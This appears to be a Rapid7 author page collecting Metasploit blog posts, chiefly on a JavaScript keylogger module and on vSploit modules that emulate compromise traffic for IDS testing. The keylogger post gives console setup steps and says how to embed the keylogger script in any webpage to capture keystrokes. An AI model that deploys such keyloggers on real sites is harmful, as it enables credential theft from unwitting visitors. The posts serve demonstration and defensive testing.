10 Posts authored by: mjc

Looks like there is another hacker movie coming out soon called "Reboot", as seen in the trailer and screen shots below. It's always cool to see Metasploit appear in movie and TV productions. If anyone out there has seen a screening of the film let us know.


See Trailer -> Reboot Trailer - YouTube


Here's a couple of screen captures from the trailer with Metasploit cameos:




Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don't understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in their databases. An attacker only needs to insert some evil code, and allow it to do the work for them.


This is one of the many reasons how the Internet is a like a field of mines, where malicious code is around every turn. If an attacker can insert code on a website they don't need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker's perspective, they can sit back and watch credentials magically appear. It reminds me of the fisherman tales of fishes jumping into their boats.


In the information security field Metasploit is the ultimate, "I can show you better than I can tell you!" software. Security professionals need to be able to demonstrate exploitation techniques to users and management. I have seen Javascript Keyloggers out there in the wild, but couldn't find a scalable, easy to deploy version.


So I sat down a couple of weeks ago and wrote a Metasploit based Javascript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine tuning the module.  Adding exploitation techniques to Metasploit solves any scalability and deploy-ability issues. James "@egyp7" Lee presented a talk at the last BSides Las Vegas, on why it makes sense to develop these types of tools using Metasploit. The reason is Metasploit has tons of code that you can reuse to build anything, almost like Lego blocks.


The Metasploit Javascript Keylogger sets up a HTTP/HTTPS listener which serves the Javascript keylogger code and captures the keystrokes over the network. I've include a demo page within the module for testing purposes. Just enter "set DEMO true" during module setup as you can see below to activate the demo page. To access the demo page, just append "/demo" to the URL provided.


Of course, the keylogger captures all keystrokes including tabs, carraige returns, and backspaces entered on the webpage once the Javascript HTML tag is in embeded on a webpage.


Step 1: Module setup:


msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options

Module options (auxiliary/server/capture/http_javascript_keylogger):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(http_javascript_keylogger) > run

[*] Using URL:
[*]  Local IP:
[*] Server started.


Step 2: Demo page URL

Screen Shot 2012-02-21 at 9.50.02 AM.png

Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with "/[whatever].js".


<script type="text/javascript" src="">


Screen Capture 1: Module setup and run

Screen Shot 2012-02-21 at 9.46.21 AM.png

Screen Capture 2: Demo page

Screen Shot 2012-02-21 at 10.00.24 AM.png

Screen Capture 3: Keystrokes captured and stored to loot

Screen Shot 2012-02-21 at 10.00.07 AM.png

As always hack responsibly. Let me know if you have any question in the comments.


If you haven't looked at Metasploit Community Edition, you should definitely give it a try.


You can also hit me on Twitter @threatagent.

Yesterday I asked a question on Twitter and got a lot of responses from the security community.


I was finishing up a Metasploit module that I was coding last weekend. I posed the challenge to myself of scanning for egress port while not actually inside a network. I accomplished this task setting up multiple listeners, and embed HTTP <img> tags in a webpage. This can easily be done with Metasploit Framework. I created a report page and a stealth page with no images. Metasploit keeps track of the connections on the attacker side as well. I also wanted to do this module without Javascript because browsers are getting smarter about Javascript doing weird things. Also I have some ports on here (23, 25, etc) that are blocked by some browsers, but you never know so I included them as well.



You can download the module at my Github wait for it to appear in the Metasploit trunk. In the meantime if you have a question about it, please leave a comment below.





Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple's coding signing requirements, which allowed him to run arbitrary code on the iPhone.



I created a couple of new vSploit modules to allow organizations to test their abilities for APT-type activity detection. There are already a few vSploit modules in the Metasploit trunk and you should see several more modules added next year. I will keep coding vSploit modules in my spare time to fill critical needs when I see them. I have created a new DNS beaconing module and filestream module and posted them to my GitHub account (links below).



There have been two really good sources of information recently on malicious domain names. If you didn't get a chance to check the following two links out, they are must reads:


I grabbed all of the domains, sorted, and eliminated duplicates and threw them into a vSploit module.

This module is available for download at my GitHub account:


I believe that it is essential that organizations, especially DoD and .Gov agencies are able to detect suspicious domains like the following. The process is simple 1) Run the vSploit module 2) Is your DNS logging/ monitoring/ picking up this activity?


If you can't see the activity you need to put something in place to make that happen.


vSploit filestream


If you are familiar with what's going on with current attacks, you may know that attackers tend to compress files, ie. encrypted RAR files and exfiltrate. Many times attackers are able to send these in plain text over networks without detection. I don't know too many places, especially government related, that run RAR software on their network. I could be totally wrong on that point, but I haven't seen it. The filestream module sends datastreams to emulate malicious files by sending a matching file header with hex padding.


The module currently sends filestreams emulating EXE (Windows Executables), ZIP (ZIP Archives), RAR (RAR Archives), and ELF (Linux/UNIX Executables). This module works with TCP/UDP and requires a listener port. Although the filetypes may be common in some environments, there are definitely cases where they shouldn't be traversing networks. Regardless, organizations should be able to see this activity.


GitHub link:


Wireshark capture of RAR filestream:




These modules can definitely help some environments. As always I've love your feedback. Please leave a comment below.

While browsing security related articles at CNN, I noticed this video of Eric Fiterman demonstrating a phishing attack and some post exploitation techniques with Metasploit Framework.



Video courtesy of:

One of my key objectives for developing the new vSploit modules was to test network devices such as Snort. Snort or Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de-facto standard when it comes to intrusion detection systems (IDS). So much that even third-party intrusion detection systems often import Snort rules.


Organizations are often having a tough time verifying that their IDS deployment actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.


However, not every rule is used in every environment. For example, if you aren't using Microsoft Frontpage on your network, you likely won't want to use Snort's Frontpage rules. On the other hand, if you are running Frontpage you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.


You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, providing there is end-to-end network connectivity to the vSploit instances:






To try out the new vSploit modules, start up the vSploit Generic HTTP Server.



Then launch Frontpage-related attack attributes:




Verify that the packets are being transmitted in Wireshark:




Finally, verify that Snort IDS sees the activity:




Metasploit vSploit Modules will be released at DEFCON 19.


[*UPDATE 6/28/2011*] vSploit Modules will be released at DEFCON


This is a follow-up post for vSploit - Virtualizing Intrusion & Exploitation Attributes with Metasploit Framework about using Metasploit as a way to test network infrastructure countermeasures and coverage. I mentioned obtaining list of suspicious domains to use for testing organization's networking intelligence. Simply put, let's create suspicious traffic to see how organizations respond.


In that post and accompanying video, I used the Metasploit vSploit DNS Beaconing module to emulate suspicious DNS traffic. One response I received was, "Where can I get a list of suspicious domains?" Generally, the best place is probably the SANS Institute Suspicious Domains page.


However, in this post I'll concentrate on's ZeuS Tracker, which has lists of suspicious IP Address and Domain Names. Out of the offered blocklists, we'll be using the ZeuS domain one, which we can use as input for the Metasploit vSploit DNS Beaconing Module. Download this list, remove comments and whitespace, then save it as a text file. At the time of this post the list contained 651 suspicious domains, which of course change from time to time.


First, confirm that the suspicious domain list is in place:




After starting up Metasploit "use auxiliary/vsploit/dns/dns_beacon" and then enter "set DOMAINS file:/tmp/domains.txt":




Now type "run" to start the queries:




This is great to test your ability to monitor suspicious domain queries in your organization, without actually infecting real hosts.


If you'd like to learn more about the new vSploit modules to test your network security infrastructure, join me in tomorrow's webinar Identifying Infrastructure Blindspots with Metasploit Framework for a live demo.


Many organizations are making significant investments in technologies in order to tell if they have been compromised; however, frequently they find out when it is too late. There are several network-based attributes that, when combined, indicate possible compromises have taken place. Many pentesters are successful at compromising hosts; however, commonly they are restricted in what they can and can't do. There needs to be a way that they can sucessfully mimick threats and scenarios, even when restricted: a way that pentesters and defenders can test organizational awareness without just "popping shells". Currently you'd have to drop live malware on networks to show customers if their countermeasures can detect the activity, which is not feasible. 


As such, there is a need for people to test their ability to find compromised hosts without spreading live malware on their network, or the need for an expensive stand alone lab.  Are their countermeasures configured correctly? Is traffic bypassing their countermeasures? Can they spot that compromised host doing the bidding of an attacker? Basically, can organizations spot a wolf in sheep's clothing?


Over the last few years I've done tons of research on intrusion attributes and have deployed an alphabet soup of security solutions. To tackle the inability to do testing of these systems, I started to write my own framework in Python, mimicking malicious activities. Now that I've joined Rapid7, I've been talking with HD Moore about incorporating the concept into the Metasploit Framework and so I've dusted off my Ruby skills and started dabbling with developing Metasploit Auxiliary modules. After a few days I have some cool things working.



I'm dubbing the new auxiliary modules vSploit modules. The name vSploit was chosen because what we are doing is virtualizing exploitation attributes. vSploit modules imitate compromised or vulnerable hosts on networks. They are created to allow enterprises a chance to test their overall security architecture and design. In my experience, people deploy a whole host of systems such as IDS/IPS, Log correlation solutions, firewalls, proxies, you name it, but many times these products are not seeing the low hanging fruit that is indicative of breaches. vSploit modules are a way to test these solutions without actually releasing live exploits on your network. I'm working on Metasploit resource files to launch virtual intrusion scenarios. 


I will be doing a webinar introducing the concept to you on June 14th, 2011 2pm EST on Identifying Infrastructure Blindspots with Metasploit Framework. In the talk I'll cover how to use vSploit modules to validate whether security solutions are working as expected. Hope you can join because I'm looking forward to your feedback.


Here is a quick demonstration of a few vSploit Modules:


vSploit Web PII Module



vSploit DNS Beacon Module


Originally posted by HD Moore:


We are happy to announce the immediate availability of version 3.7.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro. This is a relatively small release focused on bug fixes and performance improvements.


Notable highlights include an improved IPv6 reverse_tcp stager from Stephen Fewer, a performance improvement for HTTP services (client-side modules), a bug fix to channel support in the PHP Meterpreter, an update to MSFGUI, and various small tweaks to the included modules. In addition, this release adds exploit modules for the VLC Media Player and the ICONICS WebHMI ActiveX control (SCADA), as well as a new ARP Poisoning auxiliary module.


More details about the open source release can be found in the 3.7.1 Release Notes.  As always, the latest version is available from the Metasploit download page.


Metasploit Express and Metasploit Pro users will note an immediate performance improvement to the user interface as well as minor bug fixes to the Exploits and Vulnerabilities Live Report. Applying the latest software update from the Administration menu will apply the 3.7.1 upgrade. The full release notes can be found online at 3.7.1 Release Notes.

Filter Blog

By date: By tag: